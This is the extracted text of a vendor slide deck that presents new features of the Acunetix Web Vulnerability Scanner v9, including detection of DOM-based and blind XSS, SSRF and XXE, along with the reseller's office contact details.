Acunetix Web Vulnerability Scanner (WVS) TECHNICAL OVERVIEW

Ver. 9.xUpdated

© Since 2005 E-SPIN GROUP OF COMPANIES. All Right Reserved. www.e-spincorp.com

Copyrighted

Copyright © 2005 - 2014 by E-SPIN GROUP OF COMPANIES. All rights reserved.

No part of this training presentation/handout may be reproduced, stored in a retrieval system, or transmitted in any form or by an means, electronic, mechanical, photocopying, recording, scanning, or otherwise, without either the prior written permission of E-SPIN, please contact respective E-SPIN ofices and business centres across the region, or on the web at www.e-spincorp.com

Limit of Liability / Disclaimer of Warranty: While the author have used their best efforts in preparing this training presentation/handout, they make no representations or warranties with respect to the accuracy or completeness of the contents and specifically disclaim any implied warranties of merchantability or fitness for a particular purpose. No warranty may be created or extended by sales representatives or written sales materials. The advice and strategies contained herein may not be suitable for any situation. You should consult with a professional where appropriate. Neither the author shall be liable for any loss of profit or any other commercial damages, including but not limited to special, incidental, consequential, or other damages.

For general information on our other products and services or for technical support, please contact our respective E-SPIN offices and business centres, partners across the region, or email info@e-spincorp.com.

What can you expect from the event?

Acunetix v9 Technical Overview● What News

Frequent Ask Question(s)● Common questions and concerns

Lunch and Socialize Event● complementary lunch meal & ● social gathering event

Is Your Website Hackable?Check with Acunetix Web Vulnerability Scanner.

Acunetix Web Vulnerability Scanner V9Technical Overview

E-SPIN Group of Companies( Enterprise Solution Professional

on Information and Network )www.e-spincorp.com

Combatting the Web Vulnerability Threat www.acunetix.com

WVS V9 in a nutshell - 1 of 2

•FULL HTML5 support

•Improved crawling capabilities, with particular attention to dynamic pages using AJAX, JavaScript and Single Page Applications

•Improved support for Mobile friendly sites

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Combatting the Web Vulnerability Threat www.acunetix.com

WVS V9 in a nutshell – 2 of 2

•Detection of DOM based XSS

•Detection of Blind XSS (unique to WVS)

•Detection of new vulnerabilities•Server Side Request Forgery (SSRF)•XML External Entity (XXE)•Mail Header Injection•Host Header based attacks

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Combatting the Web Vulnerability Threat www.acunetix.com

FULL HTML5 support

•New HTML / Script evaluation engine

•Same as the one used in Chrome / Safari

•Used in 40% of the world’s internet browsing

•Introduces FULL support for HTML5•34% of Alexa’s Top 100 sites implemented in HTML5 in Sept 2011•HTML5 will eventually replace Flash

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Combatting the Web Vulnerability Threat www.acunetix.com

Improved Crawling capabilities

•Superior JavaScript evaluation

•Increased support for AJAX sites and other JavaScript based web sites

•Introduced support for Single Page Applications (

•You can only scan what has been crawled

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Single Page Application (SPA)

single-page application (SPA), also known as single-page interface (SPI), is a web application or web site that fits on a single web page with the goal of providing a more fluid user experience akin to a desktop application.

In an SPA, either all necessary code – HTML, JavaScript, and CSS – is retrieved with a single page load, or the appropriate resources are dynamically loaded and added to the page as necessary, usually in response to user actions. The page does not reload at any point in the process, nor does control transfer to another page, although modern web technologies (such as those included in HTML5) can provide the perception and navigability of separate logical pages in the application. Interaction with the single page application often involves dynamic communication with the web server behind the scenes.

Combatting the Web Vulnerability Threat www.acunetix.com

Improved support for Mobile Friendly sites 1 of 2

•1 billion smartphones used worldwide (

•In Asia, Internet browsing from mobile increased threefold between 2011 and 2012 (

)

•2 versions of the same website – one for normal browsers, and another for mobiles, smartphones and tablets

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Combatting the Web Vulnerability Threat www.acunetix.com

Improved support for Mobile Friendly sites 2 of 2

•WVS v9 detects mobile friendly sites at pre-crawl stage and gives option to focus the scan on one version of the site

•Our HTML / Script evaluation engine is the layout engine of choice for the default browsers in iPhone, Android, Blackberry and Amazon Kindle.

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Combatting the Web Vulnerability Threat www.acunetix.com

Detection of DOM XSS – 1 of 2

•3 types of XSS – Stored, Reflected and DOM based

•OWASP Top 10, 2013 classifies XSS as ‘Very Widespread’

•Client scripts often process the Document Object Model (DOM)

•DOM can sometimes be manipulated so as to introduce custom scripts in the DOM

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Combatting the Web Vulnerability Threat www.acunetix.com

Detection of DOM XSS – 2 of 2

•Different from Stored or Reflected XSS, since payload is placed in the DOM (in the browser) and not on the page served by the web site

•Advanced techniques do not send payload to server, making exploitation completely invisible to the website’s owner

•Detection requires advanced interpretation of JavaScript

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

DOM Based XSS

DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.

This is in contrast to other XSS attacks (stored or reflected), wherein the attack payload is placed in the response page (due to a server side flaw).

# Acunetix WVS version 9 introduces the DeepScan technology, to improves the automatic detection of DOM-based XSS by tracing the execution of the script code from the scanned website.

Combatting the Web Vulnerability Threat www.acunetix.com

Detection of Blind XSS - 1 of 2

•Blind XSS is a type of Stored XSS where the payload is injected from one web application and executed in another web application

•Example:•Hacker injects XSS on website in support request form•XSS is executed when Support open the request from the Support portal

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Combatting the Web Vulnerability Threat www.acunetix.com

Detection of Blind XSS - 2 of 2

•Blind XSS detection requires Acunetix Vulnerability Verification Service (VVS) to be enabled

•How blind XSS works•Acunetix WVS probes an XSS prone web form and tries to inject scripts in doing so.•Scripts are stored in database, but never executed on main web application.•After some time, the script is executed from other web application which makes web request to VVS

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Combatting the Web Vulnerability Threat www.acunetix.com

Detection of Blind XSS - 3 of 3

VVSAdmin

Scan Web Site

XSS stored in DB

XSS loaded in backend webapp

Script informs VVSVVS informs admin by email

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Blind XSS

Blind XSS is a flavor of cross site scripting (XSS), where the attacker “blindly” deploys a series of malicious payloads on web pages that are likely to save them to a persistent state (like in a database, or in a log file). Then, without knowing any details about where the payloads have ended up, or if (and when) they are going to be executed, the attacker waits for the payloads to be pulled out of storage and rendered on a web page loaded by a user.

Combatting the Web Vulnerability Threat www.acunetix.com

Detection of New Vulnerabilities

•Server Side Request Forgery (SSRF)

•XML External Entity (XXE)

•Mail Header Injection

•Host Header based attacks

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

Combatting the Web Vulnerability Threat www.acunetix.com

Thank YouContact Us sales@e-spincorp.com

E-SPIN Group of Companies( Enterprise Solution Professional on Information and Network )

www.e-spincorp.com

E-SPIN Group of Companies strategic presence across the regionE-SPIN SDN. BHD. (714753-U)E-SPIN INTERNATIONAL LIMITED 億轉國際有限公司 (1970945)E-SPIN INTERNATIONAL PTE. LTD. (201312412W)

MalaysiaNo. 21-2, Jalan PJU 8/3B,Perdana Business Centre,Damansara Perdana47820 Petaling Jaya, SelangorMalaysiaTel: +603 7728 2866Fax: +603 7725 4757

Hong Kong/Macau/ChinaHong Kong IslandRoom 1104, Crawford House, 70 Queen Road Central, Central, Hong Kong香港中環皇后大道中70號, 卡佛大廈1104室香港Tel: +852 2165 4773, +852 8199 9799Fax: +852 3182 5473

Singapore10 Anson Road#18-17 International PlazaSingapore 079903Tel: +65 6223 2069 / +65 3158 2203Fax: +65 6338 6311

IndonesiaOffice 8, Level 18-A, Jalan Jend Sudirman Kav. 52-53Sudirman Central Business District (SCBD)Jakarta SelatanDaerah Khusus Ibukota Jakarta 12190IndonesiaTel: +6221 2960 8334Fax: +6221 2960 8335

Thailand195 Unit 4703, 47th Floor, Empire Tower,South Sathorn Road, Yannawa, Sathorn, Bangkok 10120Thailandเลขที่ 195 ชั้น 47 หองเลขที่ 4703อาคารเอ็มไพร ทาวเวอรถ.สาทรใต แขวงยานนาวา เขตสาทร กทม. 10120ประเทศไทยTel: +66 2686 3483Fax: +66 2686 3433

Frequent Ask Questions (FAQ)

FAQ

● Upgrading

● Migration from old version to new version

● Installation and license activation

Extra Slides

E-SPIN Threat and Vulnerability Management Solutions

IT Auditing Tools and Techniques

IT Auditing Tools and Techniques

End to End Vulnerability Management

Web & Application

Unified Vulnerability Management

Penetration Testing

Web Hacking Methodology

Web Hacking Tools and Techniques

Web Application Architecture

Types of Application Security Testing (AST)

DAST IAST SAST

Acunetix AcuSensor

● Beyond black box scanning

● Checks web technology configuration

● Less false positives

● No URL rewrite rules

Types Of Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into web sites.

Types Of Cross-Site Scripting● Reflected XSS (Non-persistent)● Stored XSS(Persistent)● DOM XSS

Title

Remark

© Since 2005 E-SPIN SDN BHD. All Right Reserved. www.e-spincorp.com

Heading

Heading

Heading

Heading

●Title